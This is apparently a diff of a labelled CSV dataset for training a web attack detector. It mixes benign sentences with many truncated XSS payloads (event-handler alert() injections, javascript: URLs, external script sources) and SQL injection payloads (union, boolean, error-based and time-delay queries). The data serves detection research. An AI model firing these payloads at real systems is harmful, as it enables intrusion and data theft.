onfocusin=alert(1)></data>,1,XSS,2297 -select,0,normal,26640 -"<style>@keyframes x{}</style><caption style=""anima",1,XSS,3658 -select * from users where id = 1 +$+. union select,2,SQLi,11899 -top['al\145rt'](1),1,XSS,9383 -1 ) ) and 3580 = ( select count ( * ) from domain.,2,SQLi,16797 -1%' ) or exp ( ~ ( select * from ( select concat (,2,SQLi,16792 -"select count ( * ) from rdb$fields as t1,rdb$types",2,SQLi,22180 -Create a plan.,0,normal,22837 -1' ) or 2367 = ( select count ( * ) from rdb$field,2,SQLi,19399 --6020'+ ( select isrz where 2489 = 2489 union all ,2,SQLi,21945 -Select the most comfortable chair in the room.,0,normal,24038 -`'><script>\xE2\x80\x88javascript:alert(510)</scri,1,XSS,8982 -select ( case when ( 8233 = 1074 ) then 8233 else ,2,SQLi,17546 -<var onpointerdown=alert(1)>XSS</var>,1,XSS,5974 -1' ) and 9660 = ( select count ( * ) from all_user,2,SQLi,13124 -1' ) as keom where 7524 = 7524 and 2716 = ( select,2,SQLi,17120 -1%' ) and 9660 = ( select count ( * ) from all_use,2,SQLi,21965 -<main onpointerleave=alert(1)>XSS</main>,1,XSS,5633 -"select count ( * ) from domain.domains as t1,domai",2,SQLi,16903 --7277 ) ) ) order by 1#,2,SQLi,19877 -Plant some fresh flowers.,0,normal,22563 -select * from users where id = 1 union select @ $_,2,SQLi,11433 -1' in boolean mode ) or 4411 = ( select count ( * ,2,SQLi,18375 -"<div draggable=""true"" contenteditable>drag me</div",1,XSS,5787 -( case when 8422 = 8452 then 1 else null end ),2,SQLi,19947 -"<div draggable=""true"" contenteditable>drag me</div",1,XSS,8297 -select * from users where id = 1 or ( $+ ) = 1 or ,2,SQLi,11513 -"<button draggable=""true"" ondragend=""alert(1)"">test",1,XSS,5468 -"-9553"" ) as geih where 6453 = 6453 or 8453 = 8159-",2,SQLi,12984 -1' ) where 4500 = 4500,2,SQLi,19305 -"1%"" ) ) ) and 3707 = ( select count ( * ) from sys",2,SQLi,12696 -1'|| ( select 'hlxd' from dual where 2615 = 2615 a,2,SQLi,16648 -"<style oncopy=""alert(1)"" contenteditable>test</sty",1,XSS,3088 --1300 ) as rrsm where 1086 = 1086 or 4493 = utl_in,2,SQLi,16070 -Where's the chateau?,0,normal,23569 -"<nobr onmouseleave=""alert(1)"">test</nobr>",1,XSS,2479 -1' ) ) as yyud where 4934 = 4934,2,SQLi,14928 -<textarea onfocusout=alert(1) id=x></textarea><inp,1,XSS,5432 -"UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8",2,SQLi,10816 -or%201=1 --,2,SQLi,10102 -Merge the project files.,0,normal,22681 -1 ) and 2853 = cast ( ( chr ( 113 ) ||chr ( 113 ) ,2,SQLi,13543 -"{""id"":null,""firstName"":""Gowrie"",""lastName"":""Manogh",0,normal,27521 -"1"" ) ) ) ( select ( case when ( 4587 = 4587 ) then",2,SQLi,19027 -They must select quickly.,0,normal,24305 -1 ) where 8008 = 8008 and 5556 = ( select count ( ,2,SQLi,15416 -1 ) where 6990 = 6990 and 2716 = ( select count ( ,2,SQLi,13515 -"<style>@keyframes x{}</style><kbd style=""animation",1,XSS,8456 -1%' ) ) and 8635 = ( select count ( * ) from gener,2,SQLi,19302 -ORDER BY 14,2,SQLi,10318 -1' where 1895 = 1895 or 5286 = ( select count ( * ,2,SQLi,19820 -"<blink draggable=""true"" ondrag=""alert(1)"">test</bl",1,XSS,5539 -1 ) where 1929 = 1929 and ( select * from ( select,2,SQLi,20975 +"<var draggable=""true"" ondragenter=""alert(1)"">test<",1,XSS,2298 +-4518 where 8023 = 8023 or 6872 = 6872--,2,SQLi,21618 +"<title onmouseleave=""alert(1)"">test</title>",1,XSS,3660 +) ) or sleep ( __TIME__ ) = ',2,SQLi,11901 +"xmlns:svg=""http://www.w3.org/2000/svg"">",1,XSS,9385 +Select a tea flavor to relax.,0,normal,24255 +1'+ ( select sshu where 3442 = 3442 and ( select 2,2,SQLi,16568 +"-2790"" ) ) as vcvw where 6075 = 6075 or 7078 = 814",2,SQLi,19799 +Select the movie.,0,normal,22834 +"-1573"" ) union all select 3928,3928,3928,3928--",2,SQLi,15432 +"-6870"" ) as deox where 8198 = 8198 union all selec",2,SQLi,21943 +1,0,normal,26664 +`'><script>\xE2\x80\x8Ajavascript:alert(513)</scri,1,XSS,8984 +"1"" or ( select 2* ( if ( ( select * from ( select ",2,SQLi,17544 +"<style>@keyframes x{}</style><command style=""anima",1,XSS,5976 +"1', ( select ( case when ( 6560 = 2813 ) then 1 el",2,SQLi,13117 +"-4866"" ) as eyrq where 8365 = 8365 or 1898 = 8320#",2,SQLi,17118 +"1%' union all select null,null,null,null,null,null",2,SQLi,21963 +<style>:target {color:red;}</style><marquee id=x s,1,XSS,5635 +Select trace.,0,normal,24662 +1 and 7533 = 7533# absp,2,SQLi,19875 +Join the club.,0,normal,22823 +"select * from users where id = 1 or ""%."" or 1 = 1 ",2,SQLi,11435 +-3634%' ) ) or 2671 = 2434,2,SQLi,18373 +<style>:target {color: red;}</style><rp id=x style,1,XSS,5789 +select ( case when ( 8618 = 8706 ) then 8618 else ,2,SQLi,22174 +<base onpointerup=alert(1)>XSS</base>,1,XSS,8299 +select * from users where id = 1 or \<$ or 1 = 1 -,2,SQLi,11515 +"<div draggable=""true"" contenteditable>drag me</div",1,XSS,5470 +"select * from generate_series ( 6200,6200,case whe",2,SQLi,18208 +-7663' ) ) or 1558 = 1104 and ( ( 'wsrq' = 'wsrq,2,SQLi,19303 +"1' ) and 4241 = convert ( int, ( select char ( 113",2,SQLi,16225 +1 ) where 9149 = 9149 and char ( 120 ) ||char ( 10,2,SQLi,16646 +<spacer id=x tabindex=1 onfocus=alert(1)></spacer>,1,XSS,3089 +"1"" ) ) ) or extractvalue ( 1297,concat ( 0x5c,0x71",2,SQLi,16790 +1 ) ) as fqee where 3286 = 3286,2,SQLi,19007 +"<nav onkeydown=""alert(1)"" contenteditable>test</na",1,XSS,2480 +"1"" ) ) ) and 3754 = ( select upper ( xmltype ( chr",2,SQLi,14921 +"\"";alert('');//",1,XSS,5434 +"UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8",2,SQLi,10818 +) union select * from information_schema.tables;,2,SQLi,10104 +"1"" ) and 2716 = ( select count ( * ) from sysusers",2,SQLi,15803 +select ( case when ( 9318 = 7198 ) then 9318 else ,2,SQLi,13536 +"-8312%"" ) ) union all select 4972--",2,SQLi,15104 +"-8118"" ) where 3561 = 3561 or ( 8459 = 8459 ) *490",2,SQLi,19025 +Select the best route.,0,normal,24302 +select ( case when ( 2676 = 4191 ) then 2676 else ,2,SQLi,15408 +1 ) ) as huxq where 7451 = 7451 union all select n,2,SQLi,13508 +<style>:target {transform: rotate(180deg);}</style,1,XSS,8458 +"1%"" ) ) or sleep ( 5 ) and ( ( ""%"" = """,2,SQLi,19300 +ORDER BY 16,2,SQLi,10320 +-5250 ) where 1591 = 1591 or 5903 = ( 'qqpjq'|| ( ,2,SQLi,19818 +"<kbd onclick=""alert(1)"">test</kbd>",1,XSS,5541 +1 where 4003 = 4003 union all select null--,2,SQLi,20973 "<A HREF=""http://66.000146.0x7.147/"">XSS</A>",1,XSS,832 --4873' ) ) ) or 3038 = 3038,2,SQLi,18224 -select ( case when ( 3140 = 4625 ) then 1 else 314,2,SQLi,18502 -1 ) as ihan where 5298 = 5298 and elt ( 6587 = 347,2,SQLi,16794 -"<summary oncontextmenu=""alert(1)"">test</summary>",1,XSS,8284 -<del onblur=alert(1) tabindex=1 id=x></del><input ,1,XSS,6181 +"1' ) and 4241 = convert ( int, ( select char ( 113",2,SQLi,18222 +"1%"" ) order by 1#",2,SQLi,13825 +Select a book for your reading time.,0,normal,24100 +<marquee onpointerdown=alert(1)>XSS</marquee>,1,XSS,8286 +"tYPE=""text/x-scriptlet"" DATA=""http://.rocks/script",1,XSS,6183 "{""id"":null,""firstName"":""Yingui"",""lastName"":""Wang"",",0,normal,27380 -<style>:target {transform: rotate(180deg);}</style,1,XSS,1929 -"&lt;SCRIPT&gt;alert(String.fromCharCode(88,83,83))",1,XSS,1371 -<noframes onpointerenter=alert(1)>XSS</noframes>,1,XSS,3091 -1' ) as kbja where 4275 = 4275 and ( select 2* ( i,2,SQLi,17204 -<element onfocusout=alert(1) tabindex=1 id=x></ele,1,XSS,7991 -1' and ( select * from ( select ( sleep ( 5 ) ) ) ,2,SQLi,18207 -"-3769"" ) ) ) union all select 8456#",2,SQLi,15892 -"1%"" ) or char ( 75 ) ||char ( 70 ) ||char ( 99 ) |",2,SQLi,14515 -1' ) ) and ( select 9067 from ( select count ( * ),2,SQLi,17586 -"-5755"" or 3581 = 7566",2,SQLi,21579 -<iframe src=http://google.com <,1,XSS,9567 -<tfoot id=x tabindex=1 onfocus=alert(1)></tfoot>,1,XSS,1917 -Delete the tweet.,0,normal,22884 -1 where 5161 = 5161 and 3754 = ( select upper ( xm,2,SQLi,12860 -"1%"" ) ) ) union all select null,null#",2,SQLi,19793 --4219' or 2724 in ( ( char ( 113 ) +char ( 113 ) +,2,SQLi,22250 -"1%' ) ) union all select null,null,null,null,null,",2,SQLi,20227 -The age of a child will greatly affect which gift ,0,normal,25486 -"-7171%' ) ) union all select 5580,5580,5580,5580,5",2,SQLi,16993 -"<h1 draggable=""true"" ondragenter=""alert(1)"">test</",1,XSS,8690 -select ( case when ( 7852 = 7476 ) then 7852 else ,2,SQLi,15239 -AND 1=utl_inaddr.get_host_address((SELECT DISTINCT,2,SQLi,11080 -"<colgroup onbeforecopy=""alert(1)"" contenteditable>",1,XSS,3620 -"<image draggable=""true"" ondragstart=""alert(1)"">tes",1,XSS,7426 -"<nobr onkeyup=""alert(1)"" contenteditable>test</nob",1,XSS,5988 -"select * from users where id = 1 or ""%1"" or 1 = 1 ",2,SQLi,12020 -"1' union all select null,null,null,null,null,null,",2,SQLi,18879 -select * from users where id = '1' or \<1 or 1 = 1,2,SQLi,11996 -<style>:target {transform: rotate(180deg);}</style,1,XSS,8918 -Let's decide where to go for a relaxing weekend.,0,normal,23723 -"<legend onclick=""alert(1)"">test</legend>",1,XSS,7181 -"{""id"":null,""name"":""check""}",0,normal,26867 -<mark id=x tabindex=1 ondeactivate=alert(1)></mark,1,XSS,1977 -<button onMouseOut=javascript:alert(1)>,1,XSS,9635 -1 ) as msat where 1267 = 1267,2,SQLi,12864 -"<shadow draggable=""true"" ondragleave=""alert(1)"">te",1,XSS,2310 -<output onpointerup=alert(1)>XSS</output>,1,XSS,3550 -"<style>@keyframes x{}</style><area style=""animatio",1,XSS,1767 -"<abbr onclick=""alert(1)"">test</abbr>",1,XSS,7151 -1 ) ) as qgma where 7675 = 7675 rlike ( select * f,2,SQLi,18898 -<br id=x tabindex=1 ondeactivate=alert(1)></br><in,1,XSS,4963 -"-8661"" union all select 5731,5731--",2,SQLi,22066 -"<x 1=1""onxxx=1",1,XSS,9681 -<main id=x tabindex=1 ondeactivate=alert(1)></main,1,XSS,4908 -"1"" where 3933 = 3933 or extractvalue ( 1297,concat",2,SQLi,16172 -"1"" where 7158 = 7158",2,SQLi,17227 -"<font onmouseover=""alert(1)"">test</font>",1,XSS,5165 -select ( case when ( 4994 = 1572 ) then 4994 else ,2,SQLi,19243 -"1%"" ) ) ) and 3824 = benchmark ( 5000000,md5 ( 0x7",2,SQLi,16322 -"1' ) ) ) and row ( 6237,7469 ) > ( select count ( ",2,SQLi,14777 -1' ) ) as tlsl where 8467 = 8467,2,SQLi,21293 -Merge the puzzle pieces to complete it.,0,normal,22949 -"select * from users where id = 1 or "",#"" or 1 = 1 ",2,SQLi,11425 -"<nextid onmousedown=""alert(1)"">test</nextid>",1,XSS,4639 -"1' and make_set ( 8403 = 8403,8899 ) and 'niux' = ",2,SQLi,15565 -<svg onload=alert(1)//,1,XSS,9452 -<animatemotion onpointerleave=alert(1)>XSS</animat,1,XSS,8238 -Faces Places is screening in select theaters begin,0,normal,26198 -<;IFRAME SRC=http://ha.ckers.org/scriptlet.html <;,1,XSS,1656 -"<samp onmouseleave=""alert(1)"">test</samp>",1,XSS,2862 -1' ) where 7093 = 7093 and 8148 = like ( 'abcdefg',2,SQLi,14945 -AND (SELECT * FROM (SELECT(SLEEP(5)))nQIP)#,2,SQLi,10376 -<em onpointerup=alert(1)>XSS</em>,1,XSS,8802 -"1 where 2751 = 2751 union all select null,null,nul",2,SQLi,15595 -<nobr onblur=alert(1) tabindex=1 id=x></nobr><inpu,1,XSS,3323 -<x onxxx=alert(1) 1=',1,XSS,9358 -"{""id"":null,""firstName"":""Anuar"",""lastName"":""Haron"",",0,normal,26993 -<button onSelectStart=javascript:alert(1)>,1,XSS,9666 -Order pizza tonight.,0,normal,22772 -"<A HREF=""http://%77%77%77%2E%67%6F%6F%67%6C%65%2E%",1,XSS,5904 -"<video oncopy=""alert(1)"" contenteditable>test</vid",1,XSS,3862 -<legend onblur=alert(1) tabindex=1 id=x></legend><,1,XSS,8064 -"<rp oncontextmenu=""alert(1)"">test</rp>",1,XSS,4813 -<span id=x tabindex=1 onbeforeactivate=alert(1)></,1,XSS,2127 --7901 ) order by 1--,2,SQLi,19632 -1 ) and 7533 = 7533,2,SQLi,18770 -Where's the snowboard park?,0,normal,23610 -1%' ) and ( select * from ( select ( sleep ( 5 ) ),2,SQLi,15912 -"<legend oncopy=""alert(1)"" contenteditable>test</le",1,XSS,2089 -"UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMA",2,SQLi,10669 +<body onpointerover=alert(1)>XSS</body>,1,XSS,1930 +&lt;BASE HREF=&quot;javascript:alert(&apos;XSS&apo,1,XSS,1372 +"<article onbeforecopy=""alert(1)"" contenteditable>t",1,XSS,3092 +"1%"" ) union all select null,null,null,null,null,nu",2,SQLi,20330 +"<em onmousedown=""alert(1)"">test</em>",1,XSS,7993 +"Save up to 30% off select Nailers, Compressors and",0,normal,25719 +1' where 6533 = 6533,2,SQLi,20845 +-9148 ) where 2027 = 2027 or 8571 = 8571--,2,SQLi,14508 +1 ) as udjn where 6871 = 6871 or 4915 = ( select c,2,SQLi,17584 +"1"" ) ) and 8312 = dbms_pipe.receive_message ( chr ",2,SQLi,14203 +<details open ontoggle=confirm()>,1,XSS,9569 +<details onblur=alert(1) tabindex=1 id=x></details,1,XSS,1918 +Create a blog.,0,normal,22881 +1' ) ) and 6969 = ( select 6969 from pg_sleep ( 5 ,2,SQLi,12853 +"select count ( * ) from domain.domains as t1,domai",2,SQLi,13824 +"-4236' ) union all select 2076,2076,2076,2076,2076",2,SQLi,22248 +"-9337 ) union all select 5648,5648,5648,5648,5648#",2,SQLi,14243 +1' ) ) as wuws where 6917 = 6917 union all select ,2,SQLi,15306 +select case when 7951 = 1147 then 1 else null end-,2,SQLi,13838 +"<meta onpaste=""alert(1)"" contenteditable>test</met",1,XSS,8692 +’ or ‘1’=’1,2,SQLi,22499 +AND 1=utl_inaddr.get_host_address((SELECT DISTINCT,2,SQLi,11082 +<sub onfocusout=alert(1) tabindex=1 id=x></sub><in,1,XSS,3622 +"<style>@keyframes x{}</style><keygen style=""animat",1,XSS,7428 +<shadow onpointerover=alert(1)>XSS</shadow>,1,XSS,5990 +""" or ""a"" = ""a",2,SQLi,12022 +1'+ ( select jqyo where 4426 = 4426 and 8514 = ( s,2,SQLi,18877 +""" ) or benchmark ( 10000000,MD5 ( 1 ) ) #",2,SQLi,11998 +"<var draggable=""true"" ondragend=""alert(1)"">test</v",1,XSS,8920 +Can you help me decide where to study?,0,normal,23720 +"<hgroup onbeforecopy=""alert(1)"" contenteditable>te",1,XSS,7183 +"1' ) procedure analyse ( extractvalue ( 9255,conca",2,SQLi,16677 +<style>:target {transform: rotate(180deg);}</style,1,XSS,1978 +<button onMouseUp=javascript:alert(1)>,1,XSS,9637 +1' in boolean mode ) union all select null--,2,SQLi,12857 +<tr id=x tabindex=1 ondeactivate=alert(1)></tr><in,1,XSS,2311 +"<noscript draggable=""true"" ondragleave=""alert(1)"">",1,XSS,3552 +<blockquote onpointermove=alert(1)>XSS</blockquote,1,XSS,1768 +<style>:target {color:red;}</style><param id=x sty,1,XSS,7153 +"1"" ) ) as qqhm where 7182 = 7182",2,SQLi,18896 +"<image oncut=""alert(1)"" contenteditable>test</imag",1,XSS,4965 +"1"" ) ) and 6510 = ( select count ( * ) from sysuse",2,SQLi,22064 +<script src=//brutelogic.com.br&sol;1.js&num;,1,XSS,9683 +"<isindex onbeforecopy=""alert(1)"" contenteditable>t",1,XSS,4910 +"1%' ) ) ) or elt ( 6272 = 6272,sleep ( 5 ) ) and (",2,SQLi,15179 +1 and 8407 = ( select count ( * ) from generate_se,2,SQLi,21786 +"<details onmousedown=""alert(1)"">test</details>",1,XSS,5167 +Select the right size for the clothes.,0,normal,24040 +"-1844"" where 7948 = 7948 or 1570 = convert ( int, ",2,SQLi,21072 +"-5744 ) union all select 3617,3617,3617,3617,3617,",2,SQLi,14770 +The 33 judges will have a very difficult task to s,0,normal,25487 +-8309'|| ( select 'qecl' where 8449 = 8449 union a,2,SQLi,19505 +"select * from users where id = 1 or "" ) ."" = 1 or ",2,SQLi,11427 +<tbody onpointermove=alert(1)>XSS</tbody>,1,XSS,4641 +1' ) as nexa where 6740 = 6740,2,SQLi,15557 +<script x>alert('XSS')<script y>,1,XSS,9454 +<audio id=x controls onfocusin=alert(1) id=x><sour,1,XSS,8240 +"1'+ ( select zbyt where 4575 = 4575 or row ( 1045,",2,SQLi,20739 +"<;<;SCRIPT>;alert("";XSS"";);//<;<;/SCRIPT>;",1,XSS,1657 +<header onpointerout=alert(1)>XSS</header>,1,XSS,2863 +I'm thinking of where to have my next meal.,0,normal,23986 +SLEEP(5)=,2,SQLi,10378 +<dl onpointerleave=alert(1)>XSS</dl>,1,XSS,8804 +"select count ( * ) from domain.domains as t1,domai",2,SQLi,15587 +"<output oncopy=""alert(1)"" contenteditable>test</ou",1,XSS,3325 +<x%09onxxx=1,1,XSS,9360 +"1"" ) where 3393 = 3393 or 9643 = ( select count ( ",2,SQLi,16703 +<button onStart=javascript:alert(1)>,1,XSS,9668 +Merge data sources.,0,normal,22769 +<div id=x tabindex=1 onbeforedeactivate=alert(1)><,1,XSS,5906 +<title id=x tabindex=1 onfocusin=alert(1)></title>,1,XSS,3864 +<style>:target {color: red;}</style><acronym id=x ,1,XSS,8066 +"<cite draggable=""true"" ondrag=""alert(1)"">test</cit",1,XSS,4815 +<style>:target {color: red;}</style><frameset id=x,1,XSS,2128 +1'+ ( select yjtm where 3965 = 3965 and 9389 = 344,2,SQLi,21205 +"-2046' ) union all select 6668,6668--",2,SQLi,18301 +Where's the roller rink?,0,normal,23607 +"-8106%"" ) union all select 2051,2051,2051,2051,205",2,SQLi,20857 +<nav id=x tabindex=1 onbeforedeactivate=alert(1)><,1,XSS,2090 +"UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMA",2,SQLi,10671 "&lt;LAYER SRC=\""http&#58;//ha&#46;ckers&#46;org/sc",1,XSS,982 -1 ) ( select ( case when ( 4587 = 4587 ) then rege,2,SQLi,13079 -"<ins onkeypress=""alert(1)"" contenteditable>test</i",1,XSS,6559 -"select count ( * ) from domain.domains as t1,domai",2,SQLi,19776 -"1"" ) where 1614 = 1614 or extractvalue ( 1297,conc",2,SQLi,16420 -"<shadow onclick=""alert(1)"">test</shadow>",1,XSS,5268 -union,0,normal,23119 -"![a](https://www.google.com/image.png""onload=""aler",1,XSS,9439 +1' ) where 3572 = 3572,2,SQLi,13072 +"<style>@keyframes x{}</style><ul style=""animation-",1,XSS,6561 +1' ) and 7756 = dbms_utility.sqlid_to_sqlhash ( ( ,2,SQLi,15739 +"1%' ) ) and row ( 6237,7469 ) > ( select count ( *",2,SQLi,16418 +"<div draggable=""true"" contenteditable>drag me</div",1,XSS,5270 +"1 ) union all select null,null,null#",2,SQLi,15191 +</http://<?php\><\h1\><script:script>confirm(2),1,XSS,9441 "<IMG SRC=""javascript:alert('XSS');"">",1,XSS,801 -ORDER BY 25--,2,SQLi,10267 -1'|| ( select 'xuou' from dual where 7681 = 7681 o,2,SQLi,15901 -1 and 6240 = ( 'qqpjq'|| ( select case 6240 when 6,2,SQLi,14713 -"1' ) ) or extractvalue ( 1297,concat ( 0x5c,0x7171",2,SQLi,14429 -1 ) as xylu where 3338 = 3338 rlike ( select * fro,2,SQLi,13702 -"-4100' ) ) union all select 1163,1163,1163--",2,SQLi,16581 -<style>:target {color:red;}</style><br id=x style=,1,XSS,3291 -"{""id"":null,""firstName"":""Angeline"",""lastName"":""Tan""",0,normal,27090 -"Having been ordained in 1833, he undertook college",0,normal,26129 -"1, ( select ( case when ( 8596 = 8596 ) then 1 els",2,SQLi,17308 --7021' or 3038 = 3038,2,SQLi,13174 -"1 union all select 1,2,3,4,5,6,name from sysobject",2,SQLi,11063 -"<XML ID=I><X><C><![<IMG SRC=""javas]]<![cript:docum",1,XSS,1517 -"<track onpaste=""alert(1)"" contenteditable>test</tr",1,XSS,8531 -<ul onpointerenter=alert(1)>XSS</ul>,1,XSS,1782 -Select your mark.,0,normal,24896 -<command id=x tabindex=1 ondeactivate=alert(1)></c,1,XSS,2071 -"-1197"" ) ) as dfsy where 8857 = 8857 or 3038 = 303",2,SQLi,19497 -Let's discuss where to travel next summer.,0,normal,23978 --3125' ) ) ) order by 1#,2,SQLi,14728 -"When you start the purchase, select the ""G Pay"" ic",0,normal,25147 -<meta id=x tabindex=1 onactivate=alert(1)></meta>,1,XSS,2433 -"<spacer onmouseout=""alert(1)"">test</spacer>",1,XSS,6857 -"1%' ) union all select null,null,null,null,null,nu",2,SQLi,13583 -Where's the canyon?,0,normal,23522 -"-4705' where 2029 = 2029 union all select 2029,202",2,SQLi,15801 -"1%' ) union all select null,null,null,null--",2,SQLi,19698 -""" or true--",2,SQLi,11580 -"UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMA",2,SQLi,10661 -"1%"" and 6969 = ( select 6969 from pg_sleep ( 5 ) )",2,SQLi,19398 -<animatemotion onpointerout=alert(1)>XSS</animatem,1,XSS,6585 -"<template draggable=""true"" ondrag=""alert(1)"">test<",1,XSS,3218 -<code onpointerout=alert(1)>XSS</code>,1,XSS,7667 -"1%"" ) and 8594 = ( select 8594 from pg_sleep ( 5 )",2,SQLi,18107 -"{""id"":null,""name"":""note""}",0,normal,26781 -"<ol onmousemove=""alert(1)"">test</ol>",1,XSS,7189 -select * from users where id = '1' or \.<$ union s,2,SQLi,12006 --2364'+ ( select 'qdut' where 7560 = 7560 union al,2,SQLi,21980 +ORDER BY 27--,2,SQLi,10269 +The current group of artists will select the secon,0,normal,25462 +"1%"" ) rlike ( select * from ( select ( sleep ( 5 )",2,SQLi,14706 +1' ) as jxqt where 4322 = 4322 or char ( 75 ) ||ch,2,SQLi,22133 +1%' and char ( 111 ) ||char ( 77 ) ||char ( 121 ) ,2,SQLi,13695 +1' ) or 4411 = ( select count ( * ) from sysusers ,2,SQLi,20651 +<style>@keyframes x{from {left:0;}to {left: 1000px,1,XSS,3293 +"{""id"":null,""name"":""Bulbasaur""}",0,normal,27088 +He also appointed another select committee to cons,0,normal,26126 +1' or exp ( ~ ( select * from ( select concat ( 0x,2,SQLi,13818 +1' ) as ccee where 8880 = 8880 and 8514 = ( select,2,SQLi,13167 +’ or ‘1’=’1,2,SQLi,11065 +"<XML ID=""xss""><I><B><IMG SRC=""javas<!-- -->cript:d",1,XSS,1518 +<style>:target {color:red;}</style><title id=x sty,1,XSS,8533 +"<bdo draggable=""true"" ondragenter=""alert(1)"">test<",1,XSS,1783 +Select your identity.,0,normal,24893 +"<applet onkeydown=""alert(1)"" contenteditable>test<",1,XSS,2072 +1%' ) and 4386 = utl_inaddr.get_host_address ( chr,2,SQLi,19347 +Let's discuss where to hold the family reunion.,0,normal,23975 +"-4589"" ) union all select 1441,1441,1441,1441,1441",2,SQLi,14721 +1' ) as svtm where 7627 = 7627 rlike ( select * fr,2,SQLi,19418 +"<style>@keyframes x{}</style><source style=""animat",1,XSS,2434 +<style>:target {color:red;}</style><summary id=x s,1,XSS,6859 +if ( 1087 = 5839 ) select 1087 else drop function ,2,SQLi,13576 +Where's the forest?,0,normal,23519 +call regexp_substring ( repeat ( right ( char ( 37,2,SQLi,21675 +"-8294%' union all select 8728,8728,8728,8728,8728,",2,SQLi,19696 +"select * from users where id = 1 or @#"", = 1 union",2,SQLi,11582 +"UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMA",2,SQLi,10663 +Select shift.,0,normal,24756 +<input autofocus onfocusin=alert(1)>,1,XSS,6587 +<summary id=x tabindex=1 onbeforeactivate=alert(1),1,XSS,3220 +<style>@keyframes x{from {left:0;}to {left: 1000px,1,XSS,7669 +1' ) ) as wves where 2641 = 2641 and 2388 = benchm,2,SQLi,18105 +"{""id"":null,""firstName"":"""",""lastName"":"""",""address"":",0,normal,26778 +"<keygen draggable=""true"" ondrag=""alert(1)"">test</k",1,XSS,7191 +AND 1 = utl_inaddr.get_host_address ( ( SELECT DIS,2,SQLi,12008 +He'll select the dessert.,0,normal,24462 "alert(String.fromCharCode(88,83,83))//"";alert(Stri",1,XSS,797 -"1%' ) or extractvalue ( 1297,concat ( 0x5c,0x71717",2,SQLi,17804 -Select your dream honeymoon activities.,0,normal,24393 -1%' ) ) ) order by 1#,2,SQLi,13060 -"1%"" and 6510 = ( select count ( * ) from sysusers ",2,SQLi,20491 --8328 or 2724 in ( ( char ( 113 ) +char ( 113 ) +c,2,SQLi,13348 -"))) AND 1337=BENCHMARK(5000000,MD5(0x774c5341)) AN",2,SQLi,11302 -"-3868' ) ) or make_set ( 6809 = 1236,1236 ) and ( ",2,SQLi,22089 -<sub id=x tabindex=1 ondeactivate=alert(1)></sub><,1,XSS,7771 -1%' ) ) and 8312 = dbms_pipe.receive_message ( chr,2,SQLi,16857 -<style>:target {color: red;}</style><section id=x ,1,XSS,5310 -<svg%0Aonload=%09((pro\u006dpt))()//,1,XSS,9315 -"<blockquote onbeforecut=""alert(1)"" contenteditable",1,XSS,6610 -<frame onfocusout=alert(1) tabindex=1 id=x></frame,1,XSS,3102 -"According to a statement released by the airline, ",0,normal,26412 -"<data onmousemove=""alert(1)"">test</data>",1,XSS,8277 -"1%"" ) ) ) and elt ( 1210 = 1210,sleep ( 5 ) ) and ",2,SQLi,18368 -select * from users where id = 1 or ( \+ ) = 1 or ,2,SQLi,11460 -"<caption ondblclick=""alert(1)"">test</caption>",1,XSS,6694 -"<audio autoplay onplay=alert(1)><source src=""valid",1,XSS,27 -"<menuitem oncontextmenu=""alert(1)"">test</menuitem>",1,XSS,5766 -<sub id=x tabindex=1 onfocusin=alert(1)></sub>,1,XSS,6031 -"""))) and 0=benchmark(3000000,MD5(1))%20%23",2,SQLi,11048 -"<aside onmouseleave=""alert(1)"">test</aside>",1,XSS,3100 -"Benefits include ""R Us Dollars"" for select purchas",0,normal,26326 -) waitfor delay '0:0:20' /*,2,SQLi,10925 -1' ) where 3636 = 3636 or 4240 = ( select 4240 fro,2,SQLi,18967 -1 ) ) as vrev where 4248 = 4248 and updatexml ( 33,2,SQLi,19810 -1' ) as zxos where 2745 = 2745,2,SQLi,12524 -"1 ) ) union all select null,null,null,null,null#",2,SQLi,21972 -"<section onpaste=""alert(1)"" contenteditable>test</",1,XSS,6072 -"<listing draggable=""true"" ondragend=""alert(1)"">tes",1,XSS,5701 -"-8159 where 2793 = 2793 union all select 2793,2793",2,SQLi,19464 -"1' ) procedure analyse ( extractvalue ( 9255,conca",2,SQLi,14195 -1 ) or char ( 119 ) ||char ( 100 ) ||char ( 99 ) |,2,SQLi,14364 -She'll select her jewelry.,0,normal,24331 -"<strong onmousedown=""alert(1)"">test</strong>",1,XSS,7597 -"Select ""Profile,"" which has a picture of your acco",0,normal,25673 -Select the ideal dress.,0,normal,24427 -1'|| ( select 'pvmz' from dual where 1090 = 1090 p,2,SQLi,14150 -1' ) ) ) and char ( 120 ) ||char ( 106 ) ||char ( ,2,SQLi,16760 -<style>:target {transform: rotate(180deg);}</style,1,XSS,6455 -<col onpointermove=alert(1)>XSS</col>,1,XSS,5119 -"<html onkeydown=""alert(1)"" contenteditable>test</h",1,XSS,2232 -Select the best lens for capturing beauty.,0,normal,24172 -"-1171' union all select 3958,3958,3958,3958,3958--",2,SQLi,13022 -"<;IFRAME SRC="";javascript:alert(';XSS';);"";>;<;/IF",1,XSS,1591 --1396 where 5838 = 5838 or 9323 = 9323#,2,SQLi,18916 -AND 1 = utl_inaddr.get_host_address ( ( SELECT COU,2,SQLi,12009 -"1"" where 2878 = 2878 union all select null,null,nu",2,SQLi,22318 -<ol onblur=alert(1) tabindex=1 id=x></ol><input au,1,XSS,6473 -"1"" ) ) and ( select * from ( select ( sleep ( 5 ) ",2,SQLi,14147 -"He had already attained some repute as a critic, w",0,normal,26119 +1 and 6969 = ( select 6969 from pg_sleep ( 5 ) ),2,SQLi,17802 +Randomly select a wedding theme.,0,normal,24390 Sort results where applicable.,0,normal,23286 -"<;IMG SRC="";javascript:alert(';XSS';);"";>;",1,XSS,1593 -"<source oncut=""alert(1)"" contenteditable>test</sou",1,XSS,8638 -\u003c,1,XSS,1083 -<style>@keyframes x{from {left:0;}to {left: 1000px,1,XSS,4375 -"<sub onbeforecut=""alert(1)"" contenteditable>test</",1,XSS,3222 -"<dt onbeforepaste=""alert(1)"" contenteditable>test<",1,XSS,7853 -"He edited the Works of William Warburton, the Sele",0,normal,26123 -<picture onpointerup=alert(1)>XSS</picture>,1,XSS,2304 -<tt onblur=alert(1) tabindex=1 id=x></tt><input au,1,XSS,3547 -1 ) ) as dhge where 4816 = 4816 and 2388 = benchma,2,SQLi,14496 -"UNION SELECT 